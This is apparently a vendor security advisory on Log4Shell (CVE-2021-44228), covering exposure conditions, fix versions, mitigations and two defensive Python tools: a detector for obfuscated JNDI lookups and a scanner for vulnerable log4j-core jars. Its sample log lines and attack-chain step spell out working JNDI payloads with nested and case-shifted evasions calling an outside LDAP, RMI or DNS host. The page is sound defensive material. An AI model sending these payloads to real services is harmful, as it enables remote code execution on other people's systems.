Log4Shell
Remote code execution via JNDI lookup in log messages
Severity: CRITICAL
CVSS: 10.0
Exploitation: Actively exploited in the wild since December 2021; listed in CISA's Known Exploited Vulnerabilities catalog.
Fix available: Yes. Upgrade log4j-core to 2.17.1 or later (2.12.4 on Java 7, 2.3.2 on Java 6).
Should I care?
This matters if:
- log4j-core 2.0-beta9 through 2.14.1 is on your classpath, directly or as a transitive dependency (check fat jars, WAR/EAR bundles and vendor appliances, not just your build file)
- Any attacker-controlled string reaches a log statement: request headers such as User-Agent, usernames, form fields, API payloads, file names, error messages
- Your JVM can open outbound LDAP, RMI or DNS connections, so the lookup can reach the attacker's server (DNS alone is enough to confirm exposure and leak data)
- You rely on input filtering or a WAF to stop it: the lookup syntax can be nested and case-shifted, and many filters missed the obfuscated forms
Not relevant if:
- log4j-core is not on your classpath (log4j-api on its own, Logback, java.util.logging, or Log4j 1.x, which does not resolve lookups in messages and is not affected by this CVE)
- Every copy of log4j-core you ship is 2.17.1 or later (2.12.4 on Java 7, 2.3.2 on Java 6)
- You cannot upgrade but have removed the JndiLookup class from every copy of log4j-core you ship
How it breaks apps
1. An attacker-controlled string containing a lookup such as ${jndi:ldap://attacker-host/a} reaches a Log4j 2 log statement (a User-Agent header, a username, a form field).
2. Log4j's message formatting resolves the ${...} lookup and makes a JNDI request to the attacker's LDAP or RMI server.
3. The server's response points the JVM at a remote class, or returns a serialized object, which the JVM loads or deserializes.
4. Remote code execution with the privileges of the application process.
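The chain above is triggered by the lookup syntax, and the obfuscations attackers used (nested ${lower:j}, ${::-j} default-value tricks, mixed-case jndi) are exactly what naive substring filters missed. The following detector is an added example, not code from this page or from Shoulder: it models the small subset of Log4j lookup resolution those evasions rely on (lower, upper, and the ":-" default value, with case-insensitive lookup names), collapses nested lookups innermost-first, and then reports which JNDI scheme a vulnerable log4j-core would have contacted. The log lines are constructed and the IPs are documentation addresses.

```python
import re
from typing import Optional

# Constructed sample access-log lines (not real traffic): one benign request and
# several Log4Shell probes using obfuscations seen in the wild.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:11 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:13 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.7:1099/x}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:15 +0000] "GET / HTTP/1.1" 200 "-" "${${env:NOPE:-j}ndi:${upper:l}dap://203.0.113.7/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:17 +0000] "GET / HTTP/1.1" 200 "-" "${jNdI:dns://203.0.113.7/${hostName}}"',
]

# Innermost ${...}: a body containing no further "$", "{" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A jndi lookup with its scheme (ldap, ldaps, rmi, dns, iiop, ...); names are case-insensitive in Log4j.
_JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def _resolve(body: str) -> Optional[str]:
    """Resolve one non-nested lookup body the way the evasions rely on.

    Returns the substituted text, or None when the lookup must stay as written
    (a jndi lookup, or a lookup name this model does not cover). This is a
    deliberately small subset of Log4j's StrSubstitutor, not a reimplementation.
    """
    prefix, _, rest = body.partition(":")
    prefix = prefix.lower()  # Log4j lower-cases the lookup name before dispatch
    if prefix == "jndi":
        return None          # the target itself: leave it intact for detection
    # "${name:-default}" and "${::-j}": the default is used when the lookup fails,
    # and the attacker counts on it failing, so assume exactly that.
    if ":-" in body and prefix not in ("lower", "upper"):
        return body.split(":-", 1)[1]
    if prefix == "lower":
        return rest.lower()
    if prefix == "upper":
        return rest.upper()
    return None


def normalize(message: str) -> str:
    """Collapse nested/obfuscated lookups innermost-first until nothing changes.

    Each substitution removes one "${", so the loop always terminates.
    """
    while True:
        changed = False

        def sub(m):
            nonlocal changed
            value = _resolve(m.group(1))
            if value is None:
                return m.group(0)
            changed = True
            return value

        message = _INNER.sub(sub, message)
        if not changed:
            return message


def find_jndi(message: str) -> Optional[str]:
    """Return the JNDI scheme if the (normalized) message carries a jndi lookup, else None."""
    m = _JNDI.search(normalize(message))
    return m.group(1).lower() if m else None


def scan(lines):
    """Return (line_number, scheme, normalized_line) for every probe found."""
    hits = []
    for n, line in enumerate(lines, 1):
        scheme = find_jndi(line)
        if scheme:
            hits.append((n, scheme, normalize(line)))
    return hits


if __name__ == "__main__":
    for n, scheme, norm in scan(SAMPLE_LOG):
        print(f"line {n}: jndi scheme={scheme}: {norm}")
```

Use the normalized form, not the raw line, when you write detection rules or search historical logs: a rule on the literal string "${jndi:" would have caught only the second sample above. The dns scheme is worth alerting on even when egress LDAP and RMI are blocked, because it confirms the lookup executed.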
Is this in your code?
Shoulder scans your codebase and tells you if CVE-2021-44228 is reachable — not just present.
npx @shoulderdev/cli trust .
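Reachability is the harder question; the first step is still an honest inventory of every log4j-core copy you actually ship, including the ones buried inside fat jars and WAR files that a build-file grep never sees. The scanner below is an added example, not Shoulder's tool or Apache code: it walks a directory, opens every jar/war/ear (recursing into nested archives such as Spring Boot's BOOT-INF/lib), reads the version from log4j-core's own pom.properties, and checks whether JndiLookup.class is still present. The "fixed" verdict is for CVE-2021-44228 specifically (2.15.0, or 2.12.2 / 2.3.1 on the Java 7 / Java 6 branches); the jar-building helper produces constructed, minimal archives for demonstration and carries no real bytecode.

```python
import io
import os
import re
import zipfile
from dataclasses import dataclass
from typing import Iterator, List, Optional, Tuple

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

# First release on each maintained branch that closes CVE-2021-44228. The trailing 1
# marks a final release so that pre-release tags (e.g. 2.0-beta9) sort below it.
FIXED_IN = {(2, 3): (2, 3, 1, 1), (2, 12): (2, 12, 2, 1)}
DEFAULT_FIXED_IN = (2, 15, 0, 1)


@dataclass
class Finding:
    path: str                  # nested jars are written as outer.jar!inner.jar
    version: Optional[str]
    jndi_class_present: bool
    status: str                # "vulnerable", "mitigated", "fixed" or "unknown"


def parse_version(text: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1, 1); '2.0-beta9' -> (2, 0, 0, 0); unparseable -> ()."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(-\w+)?", text)
    if not m:
        return ()
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0), 0 if m.group(4) else 1)


def classify(version: Optional[str], jndi_present: bool) -> str:
    if not jndi_present:
        return "mitigated"     # JndiLookup.class removed: the lookup cannot run at all
    v = parse_version(version) if version else ()
    if not v:
        return "unknown"
    return "fixed" if v >= FIXED_IN.get(v[:2], DEFAULT_FIXED_IN) else "vulnerable"


def inspect_jar(path: str, data: bytes) -> Iterator[Finding]:
    """Inspect one archive given as bytes (so nested jars need no temp files) and
    recurse into any .jar/.war/.ear entries it contains."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.M)
            version = m.group(1).strip() if m else None
            present = JNDI_LOOKUP in names
            yield Finding(path, version, present, classify(version, present))
        elif JNDI_LOOKUP in names:
            # log4j-core classes shaded into another jar without the pom.properties
            yield Finding(path, None, True, "unknown")
        for name in names:
            if name.lower().endswith((".jar", ".war", ".ear")):
                yield from inspect_jar(f"{path}!{name}", zf.read(name))


def scan_tree(root: str) -> List[Finding]:
    findings: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith((".jar", ".war", ".ear")):
                p = os.path.join(dirpath, f)
                with open(p, "rb") as fh:
                    findings.extend(inspect_jar(p, fh.read()))
    return findings


def make_fake_log4j_core(version: str, keep_jndi: bool = True) -> bytes:
    """Constructed minimal jar with only the two entries the scanner inspects."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if keep_jndi:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic only, not real bytecode
    return buf.getvalue()


def make_fat_jar(inner_name: str, inner_bytes: bytes) -> bytes:
    """Constructed outer jar (think BOOT-INF/lib) wrapping one nested jar."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(inner_name, inner_bytes)
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    for f in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{f.status:10} {f.version or '?':8} jndi_class={f.jndi_class_present} {f.path}")
```

Treat "mitigated" as a stopgap, not an end state, and treat "unknown" (shaded classes with no pom.properties) as vulnerable until proven otherwise. A jar this scanner calls "fixed" may still be below 2.17.1 and exposed to the follow-up CVEs, so the upgrade target stays 2.17.1 (2.12.4 / 2.3.2) regardless of the verdict.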
Technical details
Affected: Apache Log4j 2 (log4j-core) 2.0-beta9 through 2.14.1. When a logged message contains ${...}, Log4j's message formatting resolves it as a lookup; the jndi lookup contacts an attacker-chosen LDAP or RMI server and loads the class or serialized object it returns. 2.15.0 restricted JNDI and was bypassable in some configurations (CVE-2021-45046), 2.16.0 removed message lookups and disabled JNDI by default, and 2.17.1 (2.12.4 on Java 7, 2.3.2 on Java 6) is the recommended floor because it also closes the follow-up CVEs (CVE-2021-45105, CVE-2021-44832).
If you cannot upgrade: delete org/apache/logging/log4j/core/lookup/JndiLookup.class from every copy of log4j-core. Setting log4j2.formatMsgNoLookups=true only applies to 2.10 through 2.14.1 and was shown to be insufficient in non-default configurations (CVE-2021-45046), so do not rely on it alone.
Risk by Environment
Production (public-facing): HIGH
Patch immediately. Any attacker-controlled string that reaches a log statement triggers the lookup, and mass scanning for this CVE began within hours of disclosure.
Staging: MEDIUM
Schedule the patch, and treat the environment as production if it is reachable from the internet or from less-trusted networks; the payload only has to be logged once.
Internal services: MEDIUM
Assess exposure. An internal service is exploitable by anything that can get a string logged on it, including a compromised neighbouring host; patch first where the service handles sensitive data.
Local dev only: LOW
Minimal risk in isolated dev environments, but pin the fixed version there too so the same dependency does not ship to production.
AI Development Risk
This vulnerability pattern is commonly introduced when AI generates code.
CWE-502
Deserialization of untrusted data
In Log4Shell, the JNDI lookup loads and deserializes whatever the attacker's LDAP or RMI server returns; that is the step that turns a log line into code execution. LLMs frequently generate code that deserializes data without validation, and AI-scaffolded APIs often trust input formats implicitly. Check which log4j-core version an AI-generated build file pins rather than assuming it is current.
CWE-20
Improper input validation
LLMs routinely skip input validation, trusting that callers will provide well-formed data. For Log4Shell the relevant input is anything that ends up in a log call: logging a raw User-Agent header or request body is enough, and filtering the literal string "${jndi:" does not catch the nested and case-shifted forms.